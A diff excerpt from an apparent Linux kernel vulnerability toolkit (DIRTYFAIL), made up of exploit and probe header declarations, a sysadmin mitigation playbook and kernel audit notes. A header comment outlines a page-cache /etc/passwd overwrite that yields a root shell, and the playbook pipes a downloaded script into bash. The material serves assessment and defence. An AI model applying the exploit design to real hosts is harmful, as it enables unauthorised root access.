df_result_t dirtyfrag_esp6_active_probe(void);
df_result_t dirtyfrag_esp6_active_probe_inner(void);
#endif
File diff suppressed because it is too large
@@ -0,0 +1,34 @@
/*
* DIRTYFAIL dirtyfrag_rxrpc.h
*
* RxRPC variant of Dirty Frag (CVE-2026-43500).
*/
#ifndef DIRTYFAIL_DIRTYFRAG_RXRPC_H
#define DIRTYFAIL_DIRTYFRAG_RXRPC_H
#include "common.h"
/* Precondition probe: kernel + rxrpc.ko + AF_RXRPC openable. */
df_result_t dirtyfrag_rxrpc_detect(void);
/* Real PoC: brute-force three rxkad session keys K_A, K_B, K_C such
* that pcbc(fcrypt)-decrypting /etc/passwd line 1 at offsets 4/6/8
* with last-write-wins produces "root::0:0:GGGGGG:/root:/bin/bash".
* Then enter a fresh user/net namespace, run the three forged-handshake
* splice triggers, and (if do_shell) execve `su -` to drop a root shell
* via PAM `pam_unix nullok`. */
df_result_t dirtyfrag_rxrpc_exploit(bool do_shell);
df_result_t dirtyfrag_rxrpc_exploit_inner(void);
/* Active probe: fires ONE rxkad handshake-forgery trigger against a
* /tmp sentinel (never /etc/passwd). The trigger writes ~8 bytes of
* pcbc(fcrypt)-decrypted ciphertext into the sentinel page; we don't
* need to predict what landed, since any byte change confirms the kernel
* STORE happened. Skips fcrypt brute force entirely (a random 8-byte
* key is fine for a structural probe). Returns DF_VULNERABLE if the
* sentinel changed, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
df_result_t dirtyfrag_rxrpc_active_probe(void);
df_result_t dirtyfrag_rxrpc_active_probe_inner(void);
#endif
+244
@@ -0,0 +1,244 @@
# DIRTYFAIL — defender's playbook
A one-page operational guide for sysadmins assessing and mitigating
exposure to the Copy Fail and Dirty Frag CVE family on Linux hosts.
If you're operating a fleet of Linux servers, the questions below are
the ones to answer in order.
---
## 1. Am I vulnerable?
**Quickest answer (no compilation):**
```bash
curl -sSL https://raw.githubusercontent.com/KaraZajac/DIRTYFAIL/main/tools/dirtyfail-check.sh \
| bash
```
(Read the script before piping it into bash if you don't trust me: it's
~150 lines of plain bash that does not itself download or execute
anything else, and it is read-only on your system.)
Exit code: `0` mitigated, `1` vulnerable, `2` couldn't determine.
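
For fleet roll-ups, the three exit codes above can be mapped to labels in a small wrapper. This is a minimal sketch, assuming only the codes documented here; the function name `df_status_label` is hypothetical and not part of DIRTYFAIL.

```bash
#!/usr/bin/env bash
# Hypothetical helper (not shipped with DIRTYFAIL): map the exit code of
# dirtyfail-check.sh to a human-readable label. Only 0, 1 and 2 are
# documented; any other value is reported as "unknown".
df_status_label() {
    case "$1" in
        0) echo "mitigated" ;;
        1) echo "vulnerable" ;;
        2) echo "undetermined" ;;
        *) echo "unknown" ;;
    esac
}
```

A typical call, after downloading and reviewing the script, would be `bash ./dirtyfail-check.sh; df_status_label "$?"`.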
**Empirical answer (builds the C tool, runs the active probes):**
```bash
git clone https://github.com/KaraZajac/DIRTYFAIL.git
cd DIRTYFAIL && make
./dirtyfail --scan --active
```
The default `--scan` mode runs precondition checks (kernel version,
module presence, LSM state) plus an active probe of the Copy Fail
primitive against a sentinel file in `/tmp`. Adding `--active` extends
the sentinel-STORE probe to the other four primitives (ESP v4, ESP v6,
RxRPC, GCM) — this is the only way to distinguish a backported-patched
kernel from an unpatched one without running the full exploit. The
probes only modify temporary files in `/tmp`; `/etc/passwd` is never
touched.
**Per-CVE breakdown (manual checks):**
| Question | Command | Vulnerable if |
|---|---|---|
| Is the algif_aead module reachable? | `lsmod \| grep algif_aead` + `grep algif_aead /etc/modprobe.d/*` | Loaded AND not blacklisted |
| Are esp4/esp6 modules reachable? | `modinfo esp4 esp6` | Either present and not blacklisted |
| Is rxrpc reachable? | `lsmod \| grep rxrpc` + try `socket(AF_RXRPC, ...)` as an unprivileged user | Module loaded, or loadable from unprivileged context |
| Is unprivileged userns hardened? | `cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns` | Returns `0` or file absent |
| Does PAM accept empty passwords? | `grep nullok /etc/pam.d/common-auth` | "nullok" present without "nullok_secure" |
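
Two of the rows above lend themselves to scripting. The sketch below is one possible way to automate them, not the logic used by `dirtyfail-check.sh`; the function names are hypothetical, and the file paths are parameters (defaulting to the paths in the table) so the checks can be pointed at fixtures.

```bash
#!/usr/bin/env bash
# Hypothetical helpers mirroring two rows of the table above.

# Prints "hardened" if the sysctl file exists and reads 1; prints "exposed"
# if it reads anything else or is absent (the table's "vulnerable if" case).
userns_state() {
    local f="${1:-/proc/sys/kernel/apparmor_restrict_unprivileged_userns}"
    if [ -r "$f" ] && [ "$(cat "$f")" = "1" ]; then
        echo "hardened"
    else
        echo "exposed"
    fi
}

# Prints "nullok" if a non-comment line carries the bare nullok flag.
# grep -w treats "_" as a word character, so nullok_secure does not match.
pam_nullok_state() {
    local f="${1:-/etc/pam.d/common-auth}"
    if [ -r "$f" ] && grep -v '^[[:space:]]*#' "$f" | grep -qw nullok; then
        echo "nullok"
    else
        echo "no-nullok"
    fi
}
```

Both functions only read files, so they are safe to run on production hosts.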
---
## 2. How do I mitigate?
Three options, listed best-to-worst, plus an optional hardening step (D):
### A. Apply the upstream kernel patch (best)
The xfrm-ESP fix (CVE-2026-43284) is mainline commit `f4c50a4034e6`
(merged 2026-05-07); the algif_aead fix for Copy Fail is a separate
commit, `a664bf3d603d`. Each distro's kernel package is on its own
backport timeline:
| Distro | Status (as of 2026-05-09) |
|---|---|
| Debian 13 (`6.12.86+deb13`) | ✅ patched |
| Ubuntu 24.04 LTS | ❌ not yet patched (kernel 6.8.0-111) |
| Ubuntu 26.04 LTS | ❌ not yet patched (kernel 7.0.0-15.15, predates upstream merge) |
| AlmaLinux 10.1 | ❌ not yet patched (kernel 6.12 EL) |
| Fedora 44 | ❌ not yet patched (kernel 6.19.10) |
Run `apt list --upgradable 'linux-image-*'` / `dnf check-update kernel`
periodically and apply. (The quotes stop the shell from expanding the
glob against files in the current directory.)
### B. Layered LSM mitigation (Ubuntu 26.04 model)
If you're on Ubuntu 24.04 or 26.04, you can replicate Ubuntu 26.04's
defense-in-depth approach without waiting for the kernel patch:
```bash
# 1. Block unprivileged user namespaces from acquiring caps
echo 'kernel.apparmor_restrict_unprivileged_userns = 1' \
| sudo tee /etc/sysctl.d/99-userns-restrict.conf
sudo sysctl --system
# 2. Verify the AA hardening is in effect. Run this as a regular user:
#    under sudo the namespace is created by root and the test proves nothing.
unshare -U -r bash -c 'echo deny > /proc/self/setgroups 2>&1' \
|| echo "OK: unprivileged userns has no caps (mitigation working)"
```
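This blocks the exploit infrastructure (no capabilities inside
unprivileged user namespaces), not the underlying kernel bug. An
attacker who already holds real root, or the relevant capabilities in
the initial namespace, can still trigger it.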
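To confirm across a fleet that the sysctl actually took effect, a small read-only check is enough. The sketch below takes the sysctl file as a parameter so it can be exercised against a fixture; `userns_restricted` is an illustrative name, not a DIRTYFAIL command.

```bash
#!/usr/bin/env bash
# Report whether the AppArmor userns restriction is active.
# $1 = sysctl file to read (defaults to the real procfs path).
# Returns 0 only when the file exists and contains 1; a missing file
# or a value of 0 both count as "not restricted".
userns_restricted() {
    local f="${1:-/proc/sys/kernel/apparmor_restrict_unprivileged_userns}"
    [ -r "$f" ] && [ "$(tr -d '[:space:]' < "$f")" = "1" ]
}
```

Called with no argument it reads the live value, for example `userns_restricted || echo "userns restriction is OFF"`.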
### C. Module blacklist (`dirtyfail --mitigate` or manual)
Heaviest hammer — blacklists every module that hosts a primitive.
**Side effects: breaks IPsec, AFS, and any userspace using `AF_ALG`
AEAD.**
Automated:
```bash
sudo ./dirtyfail --mitigate
```
Manual equivalent:
```bash
sudo tee /etc/modprobe.d/dirtyfail-mitigations.conf <<'EOF'
install algif_aead /bin/false
install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
EOF
sudo rmmod algif_aead esp4 esp6 rxrpc 2>/dev/null
sudo sysctl vm.drop_caches=3
```
Undo: `sudo ./dirtyfail --cleanup-mitigate` (or delete the conf
files, then `sudo modprobe <name>` to reload as needed).
### D. Disable `pam_unix nullok`
Optional belt-and-suspenders: even if a page-cache STORE lands, the
exploit relies on PAM's `nullok` flag to convert "empty password
field in /etc/passwd" into a successful `su`. Removing `nullok` from
`/etc/pam.d/common-auth` (Debian/Ubuntu) or `/etc/pam.d/system-auth`
(Red Hat family) closes that step:
```bash
sudo sed -i 's/\bnullok\b//g' /etc/pam.d/common-auth # Debian/Ubuntu
# Verify a passworded user can still log in normally before logging out!
```
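Before and after editing the PAM stack, it helps to list exactly which active lines still carry the option. A minimal sketch, assuming the Debian/Ubuntu file layout by default; `pam_nullok_lines` is a hypothetical helper.

```bash
#!/usr/bin/env bash
# Print active (non-comment) PAM lines that still carry a bare
# "nullok" option. "nullok_secure" is treated as a different option,
# matching the manual check in section 1. $1 = PAM file to inspect.
# Exit status is 0 when at least one such line exists.
pam_nullok_lines() {
    local f="${1:-/etc/pam.d/common-auth}"
    grep -Ev '^[[:space:]]*#' "$f" | grep -w 'nullok'
}
```

On the Red Hat family the same function can be pointed at `/etc/pam.d/system-auth`. An empty result after the `sed` above suggests the option is gone from that file; it does not cover other files that include `pam_unix`.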
---
## 3. What should I monitor?
Even after mitigation, the kernel bug remains until the patch lands.
For detection:
### auditd rules (universal)
A ready-to-load rules file ships in `tools/99-dirtyfail.rules`. It
covers six syscall paths used by the exploit chain: XFRM netlink,
add_key(rxrpc), unshare(CLONE_NEWUSER), AF_ALG socket creation,
AppArmor `change_onexec` writes, and direct `/etc/passwd`/`/etc/shadow`
modifications.
```bash
sudo install -m 0640 tools/99-dirtyfail.rules /etc/audit/rules.d/
sudo augenrules --load
sudo systemctl restart auditd
```
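The shipped `tools/99-dirtyfail.rules` is the authoritative file. Purely as an illustration of what rules for some of these paths can look like, here is a sketch wrapped in a hypothetical helper, `emit_example_rules`. The key names `dirtyfail-userns`, `dirtyfail-afalg`, `dirtyfail-xfrm`, and `dirtyfail-rxkey` are the ones used by the search commands in this section; `dirtyfail-passwd`, the individual syscall filters, and the choice to audit socket creation are assumptions and may differ from the real rules.

```bash
#!/usr/bin/env bash
# Print an ILLUSTRATIVE auditd rule set (not the shipped file).
# Numeric constants: CLONE_NEWUSER=0x10000000, AF_ALG=38,
# AF_NETLINK=16, NETLINK_XFRM=6. Only 64-bit syscalls are covered.
emit_example_rules() {
    cat <<'EOF'
# User-namespace creation by a logged-in, non-system user
-a always,exit -F arch=b64 -S unshare -F a0&0x10000000 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns
# AF_ALG socket creation
-a always,exit -F arch=b64 -S socket -F a0=38 -k dirtyfail-afalg
# NETLINK_XFRM socket creation
-a always,exit -F arch=b64 -S socket -F a0=16 -F a2=6 -k dirtyfail-xfrm
# add_key calls (any key type; filtering to rxrpc keys is left out of this sketch)
-a always,exit -F arch=b64 -S add_key -k dirtyfail-rxkey
# Direct writes or attribute changes on the account databases
-w /etc/passwd -p wa -k dirtyfail-passwd
-w /etc/shadow -p wa -k dirtyfail-passwd
EOF
}
```

The output could be diffed against the shipped file to see where local tuning diverges, or redirected into a scratch file for experimenting with `auditctl -R` on a test host.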
Search for events:
```bash
# grep is more reliable than ausearch on distros that use ENRICHED
# log_format (Debian 13, Fedora 44 — ausearch -k can return "no matches"
# even when SYSCALL events with the key are present in the file).
sudo grep -E 'type=SYSCALL.*key="dirtyfail-' /var/log/audit/audit.log | tail -20
# Or per-key, only the most recent entries:
sudo grep 'key="dirtyfail-xfrm"' /var/log/audit/audit.log | tail -5
sudo grep 'key="dirtyfail-rxkey"' /var/log/audit/audit.log | tail -5
sudo grep 'key="dirtyfail-userns"' /var/log/audit/audit.log | tail -5
sudo grep 'key="dirtyfail-afalg"' /var/log/audit/audit.log | tail -5
```
(`sudo ausearch -k <key>` is the documented tool for this and works on
older distros, but enriched-format compat issues mean `grep` is the
safer default.)
The `dirtyfail-userns` rule fires on every legitimate `unshare -U` and
rootless container start — pair it with `dirtyfail-xfrm` in a SIEM
correlation rule (same auid, both within ~5s) for a high-fidelity
alert. Tuning notes inline in the rules file.
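Where no SIEM is available, the same correlation can be approximated directly on the log file. The sketch below assumes the usual `type=SYSCALL msg=audit(SECONDS.millis:serial): ... auid=N ... key="..."` record layout and that the log is in chronological order; `correlate_userns_xfrm` is an illustrative helper, not part of DIRTYFAIL.

```bash
#!/usr/bin/env bash
# Emit one ALERT line whenever a dirtyfail-xfrm event follows a
# dirtyfail-userns event from the same auid within a time window.
# $1 = audit log path, $2 = window in seconds (default 5).
correlate_userns_xfrm() {
    awk -v window="${2:-5}" '
        /type=SYSCALL/ && /key="dirtyfail-(userns|xfrm)"/ {
            # Timestamp: the integer seconds inside msg=audit(...)
            if (!match($0, /msg=audit\([0-9]+/)) next
            ts = substr($0, RSTART + 10, RLENGTH - 10)
            # Login uid: the lowercase " auid=" field (ENRICHED logs
            # add an uppercase AUID= field, which is ignored here)
            if (!match($0, / auid=[0-9]+/)) next
            auid = substr($0, RSTART + 6, RLENGTH - 6)
            if (auid == "4294967295") next      # unset auid: skip
            if ($0 ~ /key="dirtyfail-userns"/) {
                last[auid] = ts
            } else if ((auid in last) && ((ts + 0) - (last[auid] + 0) <= window + 0)) {
                printf "ALERT auid=%s userns@%s xfrm@%s\n", auid, last[auid], ts
            }
        }
    ' "$1"
}
```

Running `sudo bash -c '. ./correlate.sh; correlate_userns_xfrm /var/log/audit/audit.log'` (the file name is an assumption) prints nothing on a quiet host. Only the most recent userns event per auid is remembered, which keeps the state small at the cost of missing overlapping sequences.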
### eBPF / falco (if you have it)
Falco's `Sensitive mount opened for writing` and `Detect outbound
connections to common miner pool ports` rule sets won't help directly,
but a custom rule on `unshare(CLONE_NEWUSER)` followed by
`sendto(SOCK_RAW, NETLINK_XFRM)` from a non-zero uid is high-fidelity.
### Cheap log signal
```bash
# Hits if our exploit's marker bytes show up in /etc/passwd's page cache
# (run periodically; doesn't catch every variant but is zero-cost)
grep -E '^[^:]+::0:0:|^[^:]+:x:0000:' /etc/passwd
```
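A slightly more descriptive variant of the same check labels why each entry was flagged. This is a sketch under the assumption that the interesting signals are an empty password field and a uid of 0 on any account other than a plain `root:...:0:` entry; `suspect_passwd_entries` is a hypothetical name.

```bash
#!/usr/bin/env bash
# Print passwd-style entries that deserve a second look:
#   - any account with an empty password field, or
#   - any uid-0 entry that is not a plain "root" entry with uid "0"
#     (this also catches zero-padded uids such as 0000).
# $1 = file to scan (defaults to /etc/passwd). Reads go through the
# page cache, so a modified cached page is what gets inspected.
suspect_passwd_entries() {
    awk -F: '
        /^#/ || /^[ \t]*$/ || NF < 3 { next }   # comments, blanks, junk
        $2 == "" { print "empty-password: " $0; next }
        $3 ~ /^0+$/ && ($1 != "root" || $3 != "0") {
            print "nonstandard-uid0: " $0
        }
    ' "${1:-/etc/passwd}"
}
```

Like the one-line `grep`, this is cheap enough for a cron job, and it has the same blind spot: it only sees variants that alter `/etc/passwd` in one of these two ways.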
---
## 4. Quick reference card
```
SCAN this host:
curl ... | bash # bash check (no compile)
./dirtyfail --scan # preconds + Copy Fail probe (~1s)
./dirtyfail --scan --active # all 5 sentinel-STORE probes (~10s)
./dirtyfail --scan --active --json # same, machine-readable for SIEM
MITIGATE (Ubuntu / fleet-wide):
sudo ./dirtyfail --mitigate # one-shot defensive deployment
sudo ./dirtyfail --cleanup-mitigate # undo
MITIGATE (manual, no DIRTYFAIL):
See section 2-C above.
PATCH:
apt list --upgradable | grep linux-image
dnf check-update kernel
MONITOR:
/etc/audit/rules.d/99-dirtyfail.rules (see section 3)
EMERGENCY (suspected compromise via this CVE class):
sudo sysctl vm.drop_caches=3 # evicts page-cache exploits
sudo systemctl restart sshd # forces re-read of /etc/passwd
grep dirtyfail /etc/passwd # check for backdoor user
rm -f /var/tmp/.dirtyfail.state # clean DIRTYFAIL state file
```
---
## 5. Glossary
- **Page-cache write**: kernel writes attacker-controlled bytes into the
in-memory copy of a file (`/etc/passwd`, `/usr/bin/su`) without
modifying the file on disk. Persists in RAM until eviction.
- **PAM nullok**: configuration flag that permits authentication for
accounts with an empty password field in `/etc/passwd` (or
`/etc/shadow`).
- **xfrm-ESP**: the kernel's ESP (Encapsulating Security Payload)
implementation in the IPsec stack. The bug class affects in-place
AEAD decrypt over splice-pinned page-cache pages.
- **Userns capability stripping**: kernel-level enforcement that
unprivileged user namespaces have no `CAP_NET_ADMIN` /
`CAP_SYS_ADMIN`, blocking exploit infrastructure even when the
underlying kernel bug is unpatched.
+324
@@ -0,0 +1,324 @@
# DIRTYFAIL — research notes
This document captures kernel-source audits and analysis adjacent to
the published CVEs (CVE-2026-31431 / CVE-2026-43284 / CVE-2026-43500).
It's a living research log, not a vendor advisory: findings here are
based on reading mainline kernel source and the disclosed write-ups,
and may need re-verification as the kernel evolves.
---
## §1. Adjacent kernel paths — audit for the same skb_cow_data() bypass pattern
### TL;DR
Ten kernel paths beyond the published CVEs were audited for the
same in-place-AEAD-over-splice-pinned-pages bug class. **All ten
are structurally immune.** No undisclosed CVE candidates surfaced
in this audit; the bug class is genuinely tightly scoped to the
three published sinks plus the algif_aead authencesn/rfc4106-gcm
primitives.
### The vulnerable pattern
The CVE-2026-43284-class bug requires all four of:
1. **In-place AEAD**: `aead_request_set_crypt(req, src, dst, ...)`
where `src == dst` or the scatterlists alias the same memory.
2. **Conditional skip-COW**: the input handler has a branch that bypasses
`skb_cow_data()` on certain skb shapes (typically: non-linear with
no frag_list).
3. **`skb_to_sgvec` over skb frags**: the scatterlist passed to the
AEAD is built directly from the skb's frags, so splice-pinned page
references end up in it.
4. **Userspace path to the skb's frags**: `splice(2)`, `sendfile(2)`,
or `sendmsg(MSG_SPLICE_PAGES)` can deliver attacker-controlled
page-cache pages into those frags.
Removing any one of the four breaks the chain. The published CVEs are
the three sinks where all four conditions align (esp_input, esp6_input,
rxkad_verify_packet_1) plus the algif_aead authencesn / rfc4106-gcm
primitives that share the in-place destination scatterlist pattern.
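When triaging a candidate source file against these four conditions, a first pass can simply list where the relevant calls sit, so the branches between them can be read by hand. A minimal sketch, assuming a checked-out kernel tree; `list_cow_and_crypt_calls` is an illustrative helper and decides nothing on its own.

```bash
#!/usr/bin/env bash
# List, with line numbers, the calls that matter for the four
# conditions in one kernel source file: copy-on-write of skb data,
# scatterlist construction from the skb, and the crypto request setup.
# $1 = path to a C source file, e.g. net/ipv4/esp4.c in a kernel tree.
list_cow_and_crypt_calls() {
    grep -nE 'skb_cow_data[[:space:]]*\(|skb_to_sgvec(_nomark)?[[:space:]]*\(|(aead|skcipher)_request_set_crypt[[:space:]]*\(' "$1"
}
```

The ordering of the hits is the useful part: a `skb_cow_data(` line that always precedes `skb_to_sgvec(` points toward the safe pattern, while a copy-on-write call that sits inside a conditional needs a closer look.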
### §1.1 Path-by-path verdict
| Path | In-place crypto? | skb_cow_data | Splice-reachable? | Verdict |
|---|---|---|---|---|
| esp_input (esp4) | ✅ | conditional skip | yes | **CVE-2026-43284** (patched) |
| esp6_input | ✅ | conditional skip | yes | **CVE-2026-43284 v6** (patched) |
| algif_aead authencesn | ✅ | n/a (different path) | yes via splice→AF_ALG | **CVE-2026-31431** (patched) |
| algif_aead rfc4106-gcm | ✅ | n/a | yes | **Copy Fail GCM variant** (patched as side-effect of CF revert) |
| rxkad_verify_packet_1 | ✅ | conditional skip | yes via RxRPC handshake | **CVE-2026-43500** (NOT patched as of 2026-05-09) |
| **ah_input (ah4 + ah6)** | ✅ (HMAC, not decrypt) | **UNCONDITIONAL** | n/a | NOT vulnerable — structurally immune |
| **ipcomp_input** | ❌ (decompress, separate output pages) | conditional skip | n/a (output is fresh page) | NOT vulnerable — separate dst |
| **macsec_decrypt** | ✅ | **UNCONDITIONAL** | no — rx skbs come from netdev | NOT vulnerable — structurally immune |
| **tls_sw recv decrypt** | ✅ | unconditional, also rx-only | no — rx skbs come from TCP rx ring | NOT vulnerable |
| **tls_sw send encrypt + MSG_SPLICE_PAGES** | YES (read-only on user pages) | n/a (msg_en allocated separately) | yes (msg_pl) but only as src | NOT vulnerable — separate src/dst |
| **WireGuard `decrypt_packet`** | ✅ ChaCha20Poly1305 in-place | **UNCONDITIONAL** at line 252 | yes via UDP rx (but COW protects) | NOT vulnerable — structurally immune |
| **algif_skcipher `_skcipher_recvmsg`** | ✅ symmetric in-place possible | n/a (different module structure) | src yes (TX SGL), dst no (recv iovec) | NOT vulnerable — separate src/dst |
| **espintcp** (ESP-in-TCP) | n/a (delegates) | n/a | reaches esp_input via xfrm_rcv_encap | inherits f4c50a4034e6 patch — NOT a new CVE |
| **OpenVPN kernel offload `ovpn_aead_decrypt`** | ✅ AEAD in-place | **UNCONDITIONAL** at line 210 | yes via UDP rx (but COW protects) | NOT vulnerable — structurally immune |
| **SCTP-AUTH `sctp_auth_calculate_hmac`** | HMAC only (no decrypt, no destination write into skb data frags) | n/a | n/a — digest writes to auth chunk header (kernel-allocated), not data frags | NOT vulnerable — read-only over data |
### §1.2 Eliminated paths — why each is immune
**`ah_input` (net/ipv4/ah4.c, net/ipv6/ah6.c)** — IPsec Authentication
Header. Calls `skb_cow_data(skb, 0, &trailer)` UNCONDITIONALLY before
`skb_to_sgvec_nomark` builds the HMAC scatterlist. No skip-cow branch.
Splice-pinned pages would always be copied into a private buffer
before HMAC verification.
**`xfrm_ipcomp.c`** — IPCOMP decompression has a conditional skip-cow
branch, but the output is allocated as a fresh kernel page
(`alloc_page(GFP_ATOMIC)`) and the destination scatterlist `dsg` is
built separately from the input scatterlist `sg`. Even with
splice-pinned input pages, decompression output goes to fresh pages.
Not in-place over input.
**`macsec_decrypt` (drivers/net/macsec.c)** — MACsec receive AEAD.
Calls `skb_cow_data(skb, 0, &trailer)` unconditionally before
`skb_to_sgvec` and the in-place decrypt. Additionally: macsec rx
skbs come from netdev rx, not from userspace splice — the attacker
has no path to plant a page-cache page reference.
**`tls_sw_recvmsg` (net/tls/tls_sw.c)** — kTLS receive AEAD.
kernel.org docs: "To decrypt 'in place' kTLS calls skb_cow_data()."
COW is unconditional on the rx path. Additionally: TLS rx skbs come
from the TCP rx queue, not from splice — the only way a user can put
a page-cache page reference into a TCP rx skb is via rare
`SO_PEEK_OFF` / `MSG_PEEK` paths or kernel-side socket forwarding,
neither of which gives the attacker control.
### §1.3 kTLS send via MSG_SPLICE_PAGES — closest near-miss
The kTLS *send* path was modified in 2023 ("splice, net: Handle
MSG_SPLICE_PAGES in AF_TLS", LWN 933386) to support
`MSG_SPLICE_PAGES`, which is the same primitive Dirty Frag and Copy
Fail abuse. This was the most plausible adjacent candidate.
**Resolved: not vulnerable.** Direct reading of `net/tls/tls_sw.c`:
- `tls_sw_sendmsg_splice()` adds the user's spliced pages to `msg_pl`
(the plaintext sk_msg buffer) via `sk_msg_page_add()`.
- `tls_alloc_encrypted_msg()` calls
`sk_msg_alloc(sk, msg_en, len, 0)`, which provides **fresh kernel pages**
for the encrypted buffer.
- `tls_push_record()` chains the scatterlists:
```c
sg_chain(rec->sg_aead_out, 2, &msg_en->sg.data[i]);
```
- `tls_do_encryption()`:
```c
aead_request_set_crypt(aead_req, rec->sg_aead_in,
rec->sg_aead_out, data_len, rec->iv_data);
```
- `sg_aead_in` (chained from msg_pl, contains user's spliced page) ≠
`sg_aead_out` (chained from msg_en, kernel-allocated pages).
The encrypt READS the user's spliced /etc/passwd page but WRITES
ciphertext to `msg_en`'s kernel-allocated pages. The user's
page-cache page is never modified. This is exactly the defense the
algif_aead patch (a664bf3d603d) implemented when it reverted to
out-of-place AEAD; kTLS has had it from inception.
Compare to the vulnerable `esp_input` pattern:
```c
/* vulnerable: src == dst */
skb_to_sgvec(skb, sg, ...);
aead_request_set_crypt(req, sg, sg, ...);
```
```c
/* safe: src ≠ dst */
sg_chain(sg_aead_in, ..., msg_pl); /* user spliced pages */
sg_chain(sg_aead_out, ..., msg_en); /* kernel private pages */
aead_request_set_crypt(req, sg_aead_in, sg_aead_out, ...);
```
### §1.3a WireGuard receive — `decrypt_packet()`
ChaCha20Poly1305 in-place AEAD on incoming UDP skbs. Confirmed
**not vulnerable** in `drivers/net/wireguard/receive.c:232-277`:
```c
static bool decrypt_packet(struct sk_buff *skb, struct noise_keypair *keypair)
{
struct scatterlist sg[MAX_SKB_FRAGS + 8];
/* ... */
offset = -skb_network_offset(skb);
skb_push(skb, offset);
num_frags = skb_cow_data(skb, 0, &trailer); /* line 252, UNCONDITIONAL */
/* ... */
sg_init_table(sg, num_frags);
if (skb_to_sgvec(skb, sg, 0, skb->len) <= 0)
return false;
if (!chacha20poly1305_decrypt_sg_inplace(sg, skb->len, NULL, 0,
PACKET_CB(skb)->nonce,
keypair->receiving.key))
return false;
```
`skb_cow_data` at line 252 is UNCONDITIONAL — no skip-cow branch. By
the time the in-place AEAD runs, any splice-pinned pages have already
been copied into kernel-private pages. Same defensive pattern as
AH, MACsec, kTLS rx.
### §1.3b algif_skcipher — `_skcipher_recvmsg()`
The companion module to algif_aead, exposing symmetric ciphers
(AES-CBC, AES-CTR, etc.) over AF_ALG. Same author and patchset era
as the in-place optimization that introduced Copy Fail (2017,
72548b093ee3); the Copy Fail upstream fix only reverted algif_aead,
so worth verifying algif_skcipher independently.
`crypto/algif_skcipher.c:151-152`:
```c
skcipher_request_set_crypt(&areq->cra_u.skcipher_req, areq->tsgl,
areq->first_rsgl.sgl.sgt.sgl, len, ctx->iv);
```
- `areq->tsgl` = TX SGL, populated via `af_alg_pull_tsgl()`. CAN
contain user-spliced page-cache pages (sendmsg + splice path).
- `areq->first_rsgl.sgl.sgt.sgl` = RX SGL, populated via
`af_alg_get_rsgl(sk, msg, ...)` from the user's `recv()` iovec,
via `iov_iter_get_pages` mapping the calling process's anonymous
memory.
The cipher operation reads from `tsgl` (potentially user-spliced
page-cache pages) and writes to `rsgl` (user's recv buffer in their
own anonymous memory). **src ≠ dst; output never lands on
splice-pinned page-cache pages.**
Why this differs from algif_aead's Copy Fail: the algif_aead bug was
specifically about the `authencesn` template internally chaining TAG
pages into the destination SGL extension (`req->dst` extends past
the end of `req->src`'s last page into chained tag pages, which
happen to be the source's spliced pages). Plain skcipher has no AEAD
tags, no chained scratch — clean src/dst separation. **Not
vulnerable.**
### §1.3c espintcp — IPsec ESP over TCP
`net/xfrm/espintcp.c` is a *transport-layer wrapper* — it does no
cryptographic work itself. The `handle_esp()` function delegates
straight to `xfrm6_rcv_encap` / `xfrm4_rcv_encap`, which call into
the standard `esp_input()` / `esp6_input()` handlers. Any skb that
reaches the ESP path through espintcp is processed by the same code
that was patched by f4c50a4034e6 (SKBFL_SHARED_FRAG check).
**Verdict: not a separate CVE.** On unpatched kernels, espintcp is
just an alternative transport for the existing CVE-2026-43284 sink
(esp_input). On patched kernels the same fix covers both UDP and TCP
encapsulation. The SHARED_FRAG flag is set wherever splice can plant
pages into TCP send buffers, and the producer-side flagging
propagates through TCP into the espintcp path.
### §1.3d OpenVPN kernel offload — `ovpn_aead_decrypt()`
New module in 6.16+ implementing OpenVPN's data channel
(ChaCha20Poly1305 / AES-GCM) in the kernel. Receive AEAD path is in
`drivers/net/ovpn/crypto_aead.c`:
```c
/* line ~210 */
nfrags = skb_cow_data(skb, 0, &trailer); /* UNCONDITIONAL */
/* ... */
/* line ~228 */
skb_to_sgvec_nomark(skb, sg + 1, payload_offset, payload_len);
/* ... */
/* line ~239 */
aead_request_set_crypt(req, sg, sg, payload_len + tag_size, iv);
```
In-place AEAD (`sg, sg`) — but `skb_cow_data()` is called
unconditionally before `skb_to_sgvec_nomark` builds the scatterlist.
Splice-pinned pages always copied to kernel-private memory before
the AEAD runs. **Not vulnerable.** Same defensive pattern as
WireGuard, AH, MACsec, kTLS rx.
### §1.3e SCTP-AUTH HMAC validation
`net/sctp/auth.c:sctp_auth_calculate_hmac()` (lines 606-642) computes
HMAC over an SCTP AUTH chunk:
```c
data_len = skb_tail_pointer(skb) - (unsigned char *)auth;
digest = (u8 *)(&auth->auth_hdr + 1);
hmac_sha1_usingrawkey(asoc_key->data, asoc_key->len,
(const u8 *)auth, data_len, digest);
```
The HMAC is computed READ-ONLY over the skb's chunk data. The
digest output is written to the auth chunk's digest field
(`&auth->auth_hdr + 1`), which on the SEND path lives in
kernel-allocated chunk header memory — not in any user-spliced
data fragment. On the RECEIVE path, verification computes HMAC
over received data and compares to the sender-provided digest in a
private buffer — pure read.
The bug class requires a kernel-side WRITE to a splice-pinned page;
SCTP-AUTH only ever READS from skb data and writes the digest to a
kernel-allocated chunk header. **Not vulnerable.**
### §1.4 The protective patterns that distinguish safe from vulnerable
Every safe path on the list achieves immunity through one of three
mechanisms, each of which removes one of the four required conditions:
1. **Unconditional `skb_cow_data()`** before any in-place crypto:
AH, MACsec, kTLS rx, WireGuard, OpenVPN offload. (Removes condition 2.)
2. **Separate destination scatterlist** that never aliases the
splice-pinned source pages: kTLS tx, IPCOMP, algif_skcipher,
post-patch algif_aead. (Removes condition 1.)
3. **The in-place crypto target is fundamentally not a splice-able
skb**: kTLS rx skbs come from TCP rx, not user splice.
(Removes condition 4.)
### §1.5 Out-of-scope or low-value candidates
The candidates that remained after §1.3a-e were all eliminated as
not worth a deeper audit:
- **AF_SMC encryption** — uses kTLS/ULP underneath, already covered
by the kTLS audit (§1.2 / §1.3).
- **io_uring crypto extensions** — would inherit AF_ALG semantics,
already covered by the algif_skcipher audit (§1.3b).
- **Bluetooth CMTP/HIDP crypto** — privileged-only (HCI device
access), not an unprivileged-LPE vector.
- **Kernel TLS NIC offload** — encryption runs on the NIC firmware,
different threat surface entirely (firmware-side bug, not
page-cache-write).
- **dm-crypt / fscrypt** — block-layer / filesystem-layer
encryption. Different threat model; user can't splice arbitrary
page-cache pages into block requests in any meaningful way.
### §1.6 Methodology
For each candidate path, read the input handler and ask:
